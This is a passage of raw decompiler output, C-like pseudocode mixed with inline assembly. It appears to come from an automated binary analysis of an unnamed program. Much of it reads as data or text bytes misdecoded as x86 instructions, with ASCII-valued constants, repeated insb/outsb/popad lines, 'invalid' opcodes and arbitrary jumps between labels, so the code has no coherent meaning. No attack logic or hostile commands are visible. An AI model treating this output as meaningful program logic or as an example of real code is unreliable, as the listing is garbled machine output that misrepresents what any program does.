				 *_t255 =  *_t255 + _t255;
				_t256 = _t255 |  *_t255;
				_push(_t394);
				asm("gs outsb");
				if(_t256 != 0) {
					L10:
					_t257 = _t256 |  *_t256;
					_t440 = _t257;
					_push(_t414);
					if(_t440 < 0) {
						goto L18;
					} else {
						asm("a16 jz 0x77");
						asm("popad");
						if(_t440 != 0) {
							 *_t394 =  *_t394 + _t257;
							 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t257;
							asm("bound ebp, [ecx+0x6c]");
							asm("bound eax, [eax]");
							_t347 = _t257 + 0x5e50748;
							asm("sti");
							_pop(es);
							asm("adc al, [ecx]");
							_t354 = _t354 + _t354;
							_t401 = _t401 +  *_t394;
							 *_t347 =  *_t347 + _t347;
							 *_t354 =  *_t354 + _t347;
							_t348 = _t347 + 0x706e5500;
							asm("insb");
							 *[gs:esi] =  *[gs:esi] + _t348;
							 *_t383 =  *_t383 + _t369;
							 *((intOrPtr*)(_t369 + 0x6e)) =  *((intOrPtr*)(_t369 + 0x6e)) + _t369;
							_t394 =  *(_t354 + 0x64) * 0x5003165;
							asm("repne push es");
							asm("in eax, 0x6");
							asm("cli");
							 *_t380 =  *_t380 + _t380;
							_t257 = _t348 + 0xb9 +  *((intOrPtr*)(_t348 + 0xb9));
							goto L14;
						}
					}
				} else {
					asm("gs insb");
					asm("popad");
					asm("outsb");
					_t351 = _t256 ^ 0x00000000 | 0x76000c01;
					asm("popad");
					asm("insb");
					asm("a16 insd");
					asm("gs outsb");
					 *_t351 =  *_t351 + _t351;
					_t380 = _t380 + 1;
					 *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) =  *((intOrPtr*)( *(_t383 + 0x68) * 0x19006465 + _t369)) + _t351;
					 *(_t394 + 0x61) =  *(_t394 + 0x61) + _t380;
					asm("insb");
					asm("a16 insd");
					asm("gs outsb");
					 *_t351 =  *_t351 + _t351;
					asm("sbb eax, [es:eax]");
					 *((intOrPtr*)(_t401 + 0x18)) =  *((intOrPtr*)(_t401 + 0x18)) + _t351;
					 *_t351 =  *_t351 + _t351;
					_t257 =  *(_t383 + 0x68) * 0x35006465;
					_t414 = _t351;
					asm("sbb eax, 0x440000");
					_t394 = _t394 + 1;
					_t383 = _t383 + _t383;
					 *((intOrPtr*)(_t257 + _t257)) =  *((intOrPtr*)(_t257 + _t257)) + _t401;
					 *_t257 =  *_t257 + _t257;
					 *0x6d615300 =  *0x6d615300 + _t257;
					asm("insd");
					 *[gs:esi] =  *[gs:esi] + _t257;
					 *0x72655400 =  *0x72655400 + _t369;
					_t438 =  *0x72655400;
					if(_t438 != 0) {
						L15:
						_pop(es);
						 *((intOrPtr*)(_t380 + 0x75)) =  *((intOrPtr*)(_t380 + 0x75)) + _t380;
						asm("outsb");
						goto L16;
					} else {
						if(_t438 == 0) {
							L14:
							_t354 = _t354 + _t354;
							_t401 = _t401 +  *_t380;
							 *_t257 =  *_t257 + _t257;
							 *((intOrPtr*)(_t383 + _t257)) =  *((intOrPtr*)(_t383 + _t257)) + _t257;
							goto L15;
						} else {
							if(_t438 >= 0) {
								L16:
								asm("a16 jae 0x77");
								 *[gs:esi] =  *[gs:esi] + _t257;
								 *_t369 =  *_t369 + _t369;
								 *((intOrPtr*)(_t394 + 0x6f)) =  *((intOrPtr*)(_t394 + 0x6f)) + _t257;
								asm("insb");
								asm("a16 aaa");
								 *0x28e0146 =  *0x28e0146 + _t257;
								if( *0x28e0146 >= 0) {
									 *(_t380 + _t380) =  *(_t380 + _t380) + 1;
									L18:
									_t257 = _t257 +  *_t257;
								}
								_t354 = _t354 + _t354;
								_t401 = _t401 +  *((intOrPtr*)(_t257 + _t257));
							} else {
								_t394 = 1 +  *_t380 * 5;
								asm("movsd");
								_t256 = _t257 + 0x120296;
								_t354 = _t354 +  *((intOrPtr*)(_t401 + 7)) + _t354 +  *((intOrPtr*)(_t401 + 7));
								_t401 = _t401 +  *_t256;
								 *_t256 =  *_t256 + _t256;
								 *_t380 =  *_t380 + _t256;
								goto L10;
							}
						}
					}
				}
				 *_t257 =  *_t257 + _t257;
				_t258 = _t257 + 0x54530008;
				_t384 = _t383 - 1;
				_push(_t380);
				_t370 = _t369 + 1;
				_t355 = _t354 - 1;
				_push(_t355);
				_t402 = _t401 + 1;
				 *_t394 =  *_t394 + _t258;
				 *_t380 =  *_t380 + _t370;
				 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t258;
				asm("insb");
				_t415 =  *(_t384 + 0x73) * 0x7474616d;
				 *0x88003cf =  *0x88003cf + _t258;
				_t385 = _t384 - 1;
				 *_t380 =  *_t380 + _t380;
				 *_t355 =  *_t355 + 1;
				_t261 = _t258 + 0xdb ^  *(_t258 + 0xdb);
				 *_t261 =  *_t261 + _t261;
				_push(es);
				_t262 = _t261 |  *_t261;
				_push(_t262);
				if(_t262 >= 0) {
					L30:
					_t380 = _t380 +  *((intOrPtr*)(_t370 + 0x30031c03));
					 *_t380 =  *_t380 + _t380;
					_pop(es);
					_t355 = _t355 + _t355;
					goto L31;
				} else {
					asm("arpl [eax+0x6f], bp");
					_t415 =  *[fs:ecx+0x38] * 0xe010600;
					_t41 = _t394 + 0x67;
					 *_t41 =  *((intOrPtr*)(_t394 + 0x67)) + _t370;
					_t448 =  *_t41;
					asm("insb");
					asm("gs outsb");
					asm("popad");
					if(_t448 <= 0) {
						L31:
						 *_t355 =  *_t355 + 1;
						asm("das");
						 *_t262 =  *_t262 + _t262;
						 *_t370 =  *_t370 + _t370;
						asm("str word [ebx+0x75]");
						goto L32;
					} else {
						if(_t448 >= 0) {
							L32:
							_t355 = _t355 - 1;
							_t454 = _t355;
							if(_t454 != 0) {
								asm("bound esp, [ebp+0x6c]");
								goto L48;
							} else {
								if(_t454 >= 0) {
									L51:
									 *_t355 =  *_t355 + 1;
									_t265 = (_t262 |  *_t262) - 0xc000000 + 0x52594400;
									_t402 = _t402 + 1;
									_push(_t265);
									 *_t394 =  *_t394 + _t265;
									 *_t394 =  *_t394 + _t370;
									_t59 = _t355 + 0x65;
									 *_t59 =  *((intOrPtr*)(_t355 + 0x65)) + _t265;
									_t464 =  *_t59;
									if(_t464 < 0) {
										goto L63;
									} else {
										asm("bound esi, [edx+0x6f]");
										if(_t464 >= 0) {
											goto L64;
										} else {
											_t402 =  *(_t394 + 0x61) * 0x500746e;
											_push(6);
											asm("aam 0x4");
											_push(_t394);
											_t265 = _t265 + 0xffffffffff000b44;
											 *_t265 =  *_t265 + _t265;
											 *0x68610005 =  *0x68610005 + _t370;
											asm("arpl [edi+0x70], bp");
											 *_t394 =  *_t394 + _t265;
											 *((intOrPtr*)(_t265 + _t265)) =  *((intOrPtr*)(_t265 + _t265)) + _t370;
											_t402 = _t402 +  *_t355 + 1;
											asm("outsb");
											_t417 =  *(_t402 + 0x6c) * 0x74;
											asm("insd");
											asm("popad");
											asm("outsb");
											if(_t417 >= 0) {
												goto L65;
											} else {
												 *0x37303b3 =  *0x37303b3 + _t265;
												_t467 =  *0x37303b3;
												if(_t467 < 0) {
													_t339 = _t265 ^  *(_t394 + _t355 * 4);
													goto L58;
												}
												goto L59;
											}
										}
									}
								} else {
									if(_t454 < 0) {
										goto L45;
									} else {
										if(_t454 >= 0) {
											L50:
											_pop(_t355);
											 *((intOrPtr*)(_t394 + 2)) =  *((intOrPtr*)(_t394 + 2)) + _t370;
											goto L51;
										} else {
											if(_t454 < 0) {
												L48:
												asm("insb");
												if (_t462 == 0) goto L49;
												_t262 = _t262 + 0x15b0447;
												goto L50;
											} else {
												asm("a16 outsb");
												 *_t262 =  *_t262 ^ _t262;
												_push(es);
												 *_t394 =  *_t394 + _t262;
												 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t262;
												asm("fs outsb");
												goto L38;
											}
										}
									}
								}
							}
						} else {
							asm("o16 insb");
							 *_t262 =  *_t262 ^ _t262;
							_t262 = _t262 + 0x7080100;
							asm("movsd");
							_push(es);
							 *_t385 =  *_t385 + _t262;
							asm("adc al, [0x2d03ff00]");
							 *_t262 =  *_t262 + _t262;
							 *_t385 =  *_t385 + _t262;
							 *_t262 =  *_t262 | _t262;
							_t370 = _t355;
							_t394 = _t394 - 0xffffffffffffffff;
							_t385 = _t385;
							_push(_t262);
							_push(_t415);
							 *_t394 =  *_t394 + _t262;
							 *_t380 =  *_t380 + _t370;
							_t43 = _t355 + 0x61;
							 *_t43 =  *((intOrPtr*)(_t355 + 0x61)) + _t262;
							_t449 =  *_t43;
							if(_t449 < 0) {
								L38:
								asm("outsb");
								_t340 = _t262 + 0x790076b;
								asm("stc");
								_t355 = _t355 + _t340;
								_t341 = _t340 + 0x12;
								 *_t341 =  *_t341 | _t341;
								 *_t355 =  *_t355 + 1;
								_t342 = _t341 & 0x0a000000;
								goto L39;
							} else {
								asm("outsb");
								asm("popad");
								if(_t449 < 0) {
									L39:
									_t265 = _t342;
									asm("o16 jb 0x72");
									if (_t265 >= 0) goto L40;
									_push(es);
									 *_t385 =  *_t385 + _t265;
									_t53 = _t385 + 0x65;
									 *_t53 =  *((intOrPtr*)(_t385 + 0x65)) + _t265;
									asm("outsb");
									if ( *_t53 < 0) goto L54;
									goto L41;
								} else {
									asm("movsb");
									_t385 = _t385 +  *((intOrPtr*)(_t380 + 0x61205));
									 *_t355 =  *_t355 + 1;
									_t344 = (_t262 ^ 0x00000000) + 0x808087b;
									 *_t344 =  *_t344 + _t344;
									 *_t355 =  *_t355 | _t370;
									_t46 = _t380 + 0x69;
									 *_t46 =  *((intOrPtr*)(_t380 + 0x69)) + _t344;
									_t450 =  *_t46;
									if(_t450 >= 0) {
										 *_t344 =  *_t344 | _t344;
										 *_t355 =  *_t355 + 1;
										_t339 = _t344 ^  *_t344;
										 *_t339 =  *_t339 + _t339;
										_t370 = _t370 |  *0x62757300;
										asm("bound esp, [ecx+0x6c]");
										asm("insb");
										asm("popad");
										if(_t370 >= 0) {
											L58:
											_t265 = _t339 + 0x9e;
											L59:
											_t380 = _t380 +  *_t380;
											 *_t355 =  *_t355 + 1;
											_t265 = _t265 - 0xe000000;
											_push(cs);
											_t67 = _t355 + 0x6d;
											 *_t67 =  *((intOrPtr*)(_t355 + 0x6d)) + _t380;
											_t470 =  *_t67;
											asm("outsd");
											if(_t470 != 0) {
												asm("adc [edx], ecx");
												goto L69;
											} else {
												if(_t470 < 0) {
													L69:
													_t265 = _t265 |  *_t265;
													_t476 = _t265;
													asm("popad");
													asm("outsb");
													if(_t476 == 0) {
														goto L77;
													} else {
														goto L70;
													}
												} else {
													if(_t470 >= 0) {
														L70:
														if(_t476 < 0) {
															L79:
															_push(es);
															asm("adc dl, [edx]");
															_t356 = _t355 + _t355;
															 *_t268 =  *_t268 + _t268;
															 *((intOrPtr*)(_t356 + _t370)) =  *((intOrPtr*)(_t356 + _t370)) + _t380;
															 *((intOrPtr*)(_t385 + 0x43)) =  *((intOrPtr*)(_t385 + 0x43)) + _t370;
															_push(_t417);
															_t269 = _t268 - 1;
															_t406 = _t402 +  *_t370 + 1;
															_push(_t380);
															_t372 = _t370 + 2;
															_t419 = _t417 + 1 - 1;
															_t380 = _t380 + 1;
															 *_t394 =  *_t394 + _t269;
															 *((intOrPtr*)(_t269 + _t269)) =  *((intOrPtr*)(_t269 + _t269)) + _t269;
															asm("outsb");
															asm("outsd");
															asm("outsb");
															 *[gs:0x797043b] =  *[gs:0x797043b] + _t269;
														} else {
															if(_t476 != 0) {
																L76:
																asm("gs outsb");
																L77:
																asm("outsb");
																if (_t479 >= 0) goto L78;
																_t268 = _t265 + 0x041e042b ^  *_t380;
																asm("rol dword [esi], 0x12");
																goto L79;
															} else {
																asm("gs outsb");
																 *_t394 =  *_t394 + _t265;
																 *_t385 =  *_t385 + _t265;
																 *((intOrPtr*)(_t355 + 0x50)) =  *((intOrPtr*)(_t355 + 0x50)) + _t380;
																_pop(_t379);
																_t372 = _t379 - 1;
																_t394 = _t394;
																 *0x496053c =  *0x496053c + _t265;
																asm("lahf");
																es = _t417;
																asm("adc dl, [eax]");
																_t356 = _t355 + _t355;
																_t406 = _t402 +  *_t372;
																 *_t265 =  *_t265 + _t265;
																 *_t380 =  *_t380 + _t380;
																_t269 = _t265;
																_t419 = _t417 + 1;
																asm("gs insd");
																asm("outsd");
																 *_t394 =  *_t394 + _t269;
																 *_t356 =  *_t356 + _t372;
																_t78 = _t372 + 0x62 + _t406 * 2;
																 *_t78 =  *((intOrPtr*)(_t372 + 0x62 + _t406 * 2)) + _t372;
																if( *_t78 >= 0) {
																	asm("insb");
																	_t390 =  *(_t380 + 0x61) * 0x80050074;
																	 *0x31d0480 =  *0x31d0480 + _t269;
																	_t265 = _t269 ^  *0x111205f4;
																	_t355 = _t356 + _t356;
																	_t402 = _t406 +  *_t394;
																	 *_t265 =  *_t265 + _t265;
																	 *_t355 =  *_t355 + _t380;
																	_pop(es);
																	 *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) =  *((intOrPtr*)(_t372 + 0x41 + _t372 * 2)) + _t265;
																	_t394 = _t394 - 1;
																	_t385 = _t390 + 1 - 1;
																	_t479 = _t385;
																	_push(_t355);
																	 *_t394 =  *_t394 + _t265;
																	 *0x6c6f4300 =  *0x6c6f4300 + _t370;
																	asm("insb");
																	asm("popad");
																	asm("bound esi, [ebx+0x61]");
																	asm("insd");
																	asm("insd");
																	goto L76;
																}
															}
														}
													} else {
														asm("bound ebp, [edi+0x72]");
														 *[fs:esi] =  *[fs:esi] + _t265;
														 *0x726b7300 =  *0x726b7300 + _t265;
														_t415 =  *_t394 * 5;
														L63:
														_t266 = _t265 + 0x1fa00e5;
														 *_t394 = _t266;
														asm("repne add [edx], edx");
														_t265 = _t266 | 0x2703ff00;
														 *_t265 =  *_t265 + _t265;
														L64:
														 *_t265 =  *_t265 + _t265;
														asm("invd");
														 *((intOrPtr*)(_t385 + 0x4f)) =  *((intOrPtr*)(_t385 + 0x4f)) + _t380;
														_push(_t394);
														_push(_t380);
														_t370 = _t370 + 1;
														 *_t394 =  *_t394 + _t265;
														 *0x4b454200 =  *0x4b454200 + _t265;
														_t402 = _t402 + 1;
														_push(_t265);
														 *0x2fb085f =  *0x2fb085f + _t265;
														 *_t355 = _t265;
														asm("rol byte [edx], 0x12");
														_push(cs);
														_t355 = _t355 + _t355;
														_t417 = _t415 - 1 +  *((intOrPtr*)(_t265 + _t265));
														 *_t265 =  *_t265 + _t265;
														asm("adc [eax+eax], al");
														L65:
														 *((intOrPtr*)(_t355 + 0x63)) =  *((intOrPtr*)(_t355 + 0x63)) + _t380;
													}
												}
											}
										} else {
											goto L44;
										}
									} else {
										if(_t450 == 0) {
											L41:
											_t417 =  *_t355 * 0x2b049c05;
										} else {
											asm("outsb");
											 *[gs:0x701] =  *[gs:0x701] + _t344;
											_t48 = _t355 + 0x72;
											 *_t48 =  *((intOrPtr*)(_t355 + 0x72)) + _t380;
											_t451 =  *_t48;
											if(_t451 >= 0) {
												L44:
												_push(0x6006c61);
												 *_t355 =  *_t355 + _t370;
												_t55 = _t394 + 0x6c;
												 *_t55 =  *((intOrPtr*)(_t394 + 0x6c)) + _t339;
												_t462 =  *_t55;
												if (_t462 < 0) goto L56;
												L45:
												asm("fs outsd");
											} else {
												asm("outsb");
												if (_t451 == 0) goto L29;
												_t262 = _t344 + 0x3b102ce;
												goto L30;
											}
										}
									}
								}
							}
						}
					}
				}
				_t270 = _t269 + 0x97;
				_pop(es);
				asm("stosb");
				_t420 = _t419 + _t394;
				_pop(es);
				asm("adc dl, [ebx]");
				_t357 = _t356 + _t356;
				_t407 = _t406 +  *_t394;
				 *_t270 =  *_t270 + _t270;
				 *0x6e550005 =  *0x6e550005 + _t380;
				_push(0x6006961);
				 *_t385 =  *_t385 + _t372;
				_t97 = _t380 + 0x65;
				 *_t97 =  *((intOrPtr*)(_t380 + 0x65)) + _t270;
				asm("popad");
				asm("arpl [edi+0x6e], bp");
				if( *_t97 >= 0) {
					L87:
					_t372 = _t372 + 1;
					_t271 = _t270 + 0x2f300dd;
					asm("adc dl, [esi]");
					_t357 = _t357 + _t357;
					_t407 = _t407 +  *((intOrPtr*)(_t271 + _t271));
					 *_t271 =  *_t271 + _t271;
					asm("sbb [eax], cl");
					 *((intOrPtr*)(_t407 + 0x61)) =  *((intOrPtr*)(_t407 + 0x61)) + _t372;
					asm("a16 outsb");
					_t394 =  *(_t271 + 0x6f) * 0x1060074;
					_t272 = _t271 |  *_t271;
					goto L88;
				} else {
					asm("insb");
					asm("popad");
					asm("popad");
					asm("outsb");
					 *_t372 = _t270 + 0x3a60107;
					asm("rol byte [ebx], 1");
					asm("adc dl, [eax+eax]");
					 *_t357 =  *_t357 + 1;
					_t272 =  *_t372 ^ 0x16000000;
					_t483 = _t272;
					asm("lldt word [ebx+0x69]");
					asm("insb");
					if(_t483 == 0) {
						L89:
						asm("popad");
						asm("outsb");
						asm("arpl [ebp+0x6c], sp");
						goto L90;
					} else {
						if(_t483 < 0) {
							L88:
							 *((intOrPtr*)(_t380 + 0x6f)) =  *((intOrPtr*)(_t380 + 0x6f)) + _t380;
							asm("insd");
							goto L89;
						} else {
							asm("outsd");
							if(_t483 < 0) {
								L90:
								asm("insb");
								_t274 = (_t272 ^  *[gs:eax]) + 0xea07d7;
								goto L91;
							} else {
								_t334 = _t272 ^  *_t272;
								_push(es);
								 *((intOrPtr*)(_t334 + _t334)) =  *((intOrPtr*)(_t334 + _t334)) + _t372;
								asm("popad");
								_push(0x5006465);
								 *_t394 =  *_t394 | _t334;
								_t336 = _t334 + 0xdf;
								_t422 = _t420 +  *0x151202;
								 *_t357 =  *_t357 + 1;
								 *[cs:eax] =  *[cs:eax] + _t336;
								 *_t385 =  *_t385 + _t380;
								_t278 = _t336 + 0x41524700;
								_push(_t394);
								_t408 = 1 +  *(_t420 + 0x73) * 0x61726c6a;
								 *_t394 =  *_t394 + _t278;
								 *_t385 =  *_t385 + _t372;
								_t103 = _t278 + 0x69;
								 *_t103 =  *((intOrPtr*)(_t278 + 0x69)) + _t380;
								_t484 =  *_t103;
								asm("insb");
								_push(0x6d657261);
								if(_t484 < 0) {
									if(_t484 > 0) {
										 *0x54105b4 =  *0x54105b4 + _t278;
										goto L87;
									}
									L91:
									 *((intOrPtr*)(_t274 + _t372)) =  *((intOrPtr*)(_t274 + _t372)) + _t274;
									_pop(ss);
									_t357 = _t357 + _t357;
									 *((intOrPtr*)(_t274 + 0x12)) =  *((intOrPtr*)(_t274 + 0x12)) + _t274 + 0x12;
									 *_t372 =  *_t372 + _t357;
									_t277 =  *[fs:eax] * 0x80106;
									_t394 = _t394 + 1;
									_t408 = _t407 + 1;
									_t380 = _t380 - 1;
									_t422 = _t420 +  *_t385 - 1;
									_push(_t277);
									_push(_t380);
									_t385 = _t385 - 1;
									_push(_t422);
									 *0x4c90290 =  *0x4c90290 + _t277;
									_t372 = _t372 +  *_t277;
									asm("adc eax, 0x181202");
									 *_t357 =  *_t357 + 1;
									_t278 = _t277 & 0x00000000;
									 *_t278 =  *_t278 + _t278;
									asm("sbb al, [eax+eax]");
								}
							}
						}
					}
				}
				_t279 = _t278;
				_t423 = _t422 + 1;
				asm("arpl [gs:ecx], bp");
				_push(es);
				 *_t394 =  *_t394 + _t279;
				 *((intOrPtr*)(_t279 + 0x52)) =  *((intOrPtr*)(_t279 + 0x52)) + _t380;
				_t387 = _t385 - 1 + 1;
				_push(_t380);
				_t373 = _t372 + 1;
				 *0x35001d5 =  *0x35001d5 + _t279;
				 *_t380 = _t279;
				asm("adc bl, [ecx]");
				_t358 = _t357 + _t357;
				_t409 = _t408 +  *_t394;
				 *_t279 =  *_t279 + _t279;
				 *_t358 =  *_t358 + _t358;
				_t280 = _t279 |  *_t279;
				_t489 = _t280;
				if(_t489 < 0) {
					L98:
					_push(_t380);
					_push(_t423);
					_t373 = _t373 + 1 - 1;
					_t387 = _t387 - 1;
					_t394 = _t394 - 1;
					goto L99;
				} else {
					if(_t489 <= 0) {
						L99:
						_push(_t358);
						_push(_t423);
						 *_t394 =  *_t394 + _t280;
						 *((intOrPtr*)(_t280 + _t280)) =  *((intOrPtr*)(_t280 + _t280)) + _t373;
						_push(_t409);
						asm("outsb");
						_t423 =  *(_t387 + 0x6c) * 0x75646e61;
						asm("insb");
						asm("popad");
						_t282 = (_t280 ^  *_t280) + 0x5ec062c;
						asm("lodsb");
						_push(es);
						_push(ss);
						_push(es);
						asm("adc bl, [eax+eax]");
						 *_t358 =  *_t358 + 1;
						 *_t282 =  *_t282 - _t282;
						 *_t282 =  *_t282 + _t282;
						_push(ds);
						_t280 = _t282 |  *_t282;
						_t493 = _t280;
						asm("insb");
						asm("a16 gs insd");
						if(_t493 <= 0) {
							asm("popad");
							if (_t493 == 0) goto L101;
							_push(es);
							goto L102;
						}
					} else {
						if(_t489 <= 0) {
							goto L98;
						} else {
							asm("bound ebp, [ecx+edi*2+0x74]");
							 *_t394 =  *_t394 + _t280;
							 *_t380 =  *_t380 + _t373;
							 *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) =  *((intOrPtr*)(_t380 + 0x65 + _t394 * 2)) + _t380;
							_push(0x65);
							asm("insb");
							asm("popad");
							asm("outsb");
							 *[fs:0x451017f] =  *[fs:0x451017f] + _t280;
							es = _t387;
							asm("hlt");
							_push(es);
							asm("adc bl, [edx]");
							_t358 = _t358 + _t358;
							_t394 = _t394 +  *_t373;
							 *_t280 =  *_t280 + _t280;
							 *((intOrPtr*)(_t358 + _t373)) =  *((intOrPtr*)(_t358 + _t373)) + _t358;
							_t123 = _t358 + 0x6c;
							 *_t123 =  *((intOrPtr*)(_t358 + 0x6c)) + _t373;
							_t490 =  *_t123;
							asm("popad");
							if(_t490 < 0) {
								L103:
								asm("insd");
								_pop(_t409);
								_t394 = _t394 +  *((intOrPtr*)(_t358 + 4));
								_t329 =  *(_t380 + _t380) * 0x1d;
								 *_t329 =  *_t329 + _t329;
								_pop(ds);
								_push(es);
								 *((intOrPtr*)(_t394 + 0x72)) =  *((intOrPtr*)(_t394 + 0x72)) + _t329;
								asm("popad");
								asm("insd");
								 *[gs:eax] =  *[gs:eax] ^ _t329;
								_t331 = _t329 +  *_t373;
								_t373 = _t373 + 1;
								_t423 = _t423 +  *((intOrPtr*)(_t329 + _t329)) - 1;
								_t367 = _t358 + _t358 - 1;
								 *0x3080325 =  *0x3080325 + _t331;
								asm("outsd");
								 *(_t387 + 0xa) =  *(_t387 + 0xa) | _t367;
								asm("adc bl, [esi]");
								_t358 = _t367 + _t367;
								_t280 = _t331 +  *((intOrPtr*)(_t331 + _t331));
								 *_t394 =  *_t394 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *0x10040 =  *0x10040 + _t380;
								es = _t387;
								 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
								 *_t280 =  *_t280 + _t280;
								asm("invalid");
								asm("invalid");
								asm("invalid");
								asm("invalid");
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 + _t280;
								 *_t280 =  *_t280 ^ _t280;
							} else {
								asm("outsb");
								if(_t490 <= 0) {
									L102:
									 *0x6f6c6200 =  *0x6f6c6200 + _t280;
									goto L103;
								} else {
									asm("outsb");
									_t409 =  *_t394 * 0xc0106;
									_push(_t358);
									_push(_t423);
									_t380 = _t380 + 1;
									_t423 = _t423 - 1;
									_push(_t358);
									_push(_t423);
									_push(_t380);
									 *0x7ca0190 =  *0x7ca0190 + _t280;
									_t358 = 0x12026a04;
									asm("sbb eax, [eax]");
									 *0x12026a04 =  *0x12026a04 + 1;
									_t280 = _t280 ^ 0x00000000;
									 *_t280 =  *_t280 + _t280;
									asm("sbb eax, 0x5845000e");
									_t373 = _t373 + 1 + 2;
									_push(_t409);
									_t387 = _t387 - 1 + 1;
									_push(_t409);
									goto L98;
								}
							}
						}
					}
				}
				_t283 = _t280 + 1;
				 *((intOrPtr*)(_t283 + 0x40d0)) =  *((intOrPtr*)(_t283 + 0x40d0)) + _t283;
				 *_t283 =  *_t283 + _t283;
				_t284 = _t283 + _t380;
				asm("sbb esi, [esi]");
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				 *_t284 =  *_t284 + _t284;
				asm("les ebx, [eax]");
				_t285 = _t284 + 1;
				 *_t373 =  *_t373 + _t285;
				 *_t380 =  *_t380 + _t285;
				 *((intOrPtr*)(_t394 + _t358 + 0x40)) =  *((intOrPtr*)(_t394 + _t358 + 0x40)) + _t373;
				 *_t285 =  *_t285 + _t285;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t285 =  *_t285 + _t285;
				 *_t285 =  *_t285 + _t285;
				_pop(ds);
				_t287 = _t285 + 2;
				 *_t287 =  *_t287 + _t380;
				asm("rol byte [eax], 1");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("pushad");
				asm("sbb eax, 0x76");
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				 *_t287 =  *_t287 + _t287;
				asm("cld");
				asm("sbb [eax], al");
				 *_t287 =  *_t287 + _t287;
				 *_t394 = ds;
				_t289 = _t287 +  *_t287 + 1;
				 *_t289 =  *_t289 + _t289;
				 *_t289 =  *_t289 + _t289;
				_t359 = _t358 + _t358;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t289 =  *_t289 + 1;
				 *_t289 =  *_t289 + _t289;
				 *((intOrPtr*)(_t289 + 0x1f)) =  *((intOrPtr*)(_t289 + 0x1f)) + _t380;
				_t290 = _t289 + 1;
				 *((intOrPtr*)(_t290 - 0x30)) =  *((intOrPtr*)(_t290 - 0x30)) + _t290;
				_t291 = _t290 + 1;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t291 + 0x761c)) =  *((intOrPtr*)(_t291 + 0x761c)) + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *_t291 =  *_t291 + _t291;
				 *((intOrPtr*)(_t373 + _t359)) =  *((intOrPtr*)(_t373 + _t359)) + _t380;
				_t292 = _t291 + 1;
				 *_t373 =  *_t373 + _t292;
				 *((intOrPtr*)(_t292 + _t292)) =  *((intOrPtr*)(_t292 + _t292)) + _t292;
				 *_t394 = ds;
				_t293 = _t292 + 1;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				_t360 = _t359 + _t359;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t293 =  *_t293 + 1;
				 *_t293 =  *_t293 + _t293;
				 *((intOrPtr*)(_t293 + 0x5000401f)) =  *((intOrPtr*)(_t293 + 0x5000401f)) + _t293;
				asm("rol byte [eax], 1");
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				asm("sbb byte [0x76], 0x0");
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *((intOrPtr*)(_t373 + _t360 + 0x40)) =  *((intOrPtr*)(_t373 + _t360 + 0x40)) + _t373;
				 *_t373 =  *_t373 + _t293;
				 *0x401e8c00 =  *0x401e8c00 + _t293;
				 *_t293 =  *_t293 + _t293;
				 *_t293 =  *_t293 + _t293;
				_t361 = _t360 + _t360;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t293 =  *_t293 + 1;
				 *_t293 =  *_t293 + _t293;
				_pop(ds);
				_t295 = _t293 + _t380 + 1;
				 *((intOrPtr*)(_t295 - 0x30)) =  *((intOrPtr*)(_t295 - 0x30)) + _t295;
				_t296 = _t295 + 1;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)(_t296 + 0x761d)) =  *((intOrPtr*)(_t296 + 0x761d)) + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *((intOrPtr*)(_t373 + _t361 + 0x10040)) =  *((intOrPtr*)(_t373 + _t361 + 0x10040)) + _t296;
				_push(es);
				 *((intOrPtr*)(_t394 + _t361 + 0x40)) =  *((intOrPtr*)(_t394 + _t361 + 0x40)) + _t373;
				 *_t296 =  *_t296 + _t296;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				 *_t296 =  *_t296 + _t296;
				_t297 = _t296 + 1;
				 *((intOrPtr*)(_t297 - 0x30)) =  *((intOrPtr*)(_t297 - 0x30)) + _t380;
				_t298 = _t297 + 1;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				asm("sbb eax, 0x76");
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				 *_t298 =  *_t298 + _t298;
				asm("fcomp qword [ecx]");
				 *((intOrPtr*)(_t394 + 0x42)) =  *((intOrPtr*)(_t394 + 0x42)) + _t380;
				_t300 = _t298 + 0x00000001 ^ 0x2a263621;
				 *_t300 =  *_t300 + _t300;
